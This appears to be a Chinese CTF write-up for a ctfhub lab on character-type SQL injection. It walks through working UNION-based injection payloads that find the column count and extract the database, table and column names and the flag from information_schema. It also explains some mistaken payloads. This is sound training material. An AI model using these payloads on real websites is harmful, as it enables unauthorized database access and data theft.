2025.1.15——二、字符型注入

题目来源:ctfhub技能树

目录

一、基本操作:整理已知信息,本题为字符型注入

二、解题步骤

[step 1:确认为字符型注入](#step 1:确认为字符型注入)

[step 2:查询字段](#step 2:查询字段)

[step 3:爆数据库名](#step 3:爆数据库名)

[step 4:爆表名](#step 4:爆表名)

[step 5:爆列名](#step 5:爆列名)

[step 6:爆具体数据](#step 6:爆具体数据)

三、小结


一、基本操作:整理已知信息,本题为字符型注入

二、解题步骤

step 1:确认为字符型注入

键入:

sql 复制代码
1

键入:1' and 1=2 # 发现报错

键入:1' and 1=1 # 未发现报错

所以确认为字符型注入

step 2:查询字段

sql 复制代码
1' order by 4 #
sql 复制代码
1' order by 2 #

确认字段数为2(省略了试探字段数为3的情况)

step 3:爆数据库名

sql 复制代码
1' and 1=2 union select database(),database() #

得到两个数据库名均为sqli

step 4:爆表名

错误示范:

sql 复制代码
1' and 1=2 union select 1,group_concat(table_name)from information_schema.tables where table_name='sqli' #

错误原因:最后部分应该是 table_schema 而不是 table_name。通过指定table_schema='sqli',可以筛选出属于sqli这个数据库的所有表的名称。如果使用table_name,则需要知道具体的表名才能进行查询

正确payload:

sql 复制代码
1' and 1=2 union select 1,group_concat(table_name)from information_schema.tables where table_schema='sqli' #

得到表名分别为flag和news

step 5:爆列名

错误示范:

sql 复制代码
1' and 1=2 union select 1,group_concat(column_name)from information_schema.columns where table_name='sqli' and column_schema='flag' #

错误原因:这里的column_schema并不是information_schema.columns表中的有效字段。在information_schema.columns表中,用于指定数据库名的字段是table_schema,而不是column_schema。所以,这个查询中的条件column_schema='flag'是错误的,导致 SQL 语句无法正确执行,从而出现错误。

正确payload:

sql 复制代码
1' and 1=2 union select 1,group_concat(column_name)from information_schema.columns where table_name='flag' #

step 6:爆具体数据

sql 复制代码
1' and 1=2 union select 1,flag from sqli.flag #

三、小结

与整数型注入流程大致相同,区别 在于需要加上单引号 进行语句闭合,最后还要加上**#**将SQL语句剩余部分注释掉

相关推荐
Hello.Reader3 小时前
RedisJSON 路径语法深度解析与实战
数据库·redis·缓存
TDengine (老段)3 小时前
TDengine 使用最佳实践(2)
大数据·数据库·物联网·时序数据库·iot·tdengine·涛思数据
设计师小聂!6 小时前
Linux系统中部署Redis详解
linux·运维·数据库·redis
kfepiza6 小时前
Debian-10编译安装Mysql-5.7.44 笔记250706
linux·数据库·笔记·mysql·debian·bash
Touper.6 小时前
Redis 基础详细介绍(Redis简单介绍,命令行客户端,Redis 命令,Java客户端)
java·数据库·redis
不剪发的Tony老师6 小时前
phpMyAdmin:一款经典的MySQL在线管理工具又回来了
数据库·mysql·phpmyadmin
极限实验室6 小时前
TDBC 2025 可信数据库发展大会,极限科技邀您来赴约!
数据库
西西西仓鼠6 小时前
python学习打卡:DAY 40 训练和测试的规范写法
学习
FreeBuf_6 小时前
黄金旋律IAB组织利用暴露的ASP.NET机器密钥实施未授权访问
网络·后端·asp.net
Magnetic_h6 小时前
【iOS】方法与消息底层分析
笔记·学习·macos·ios·objective-c·cocoa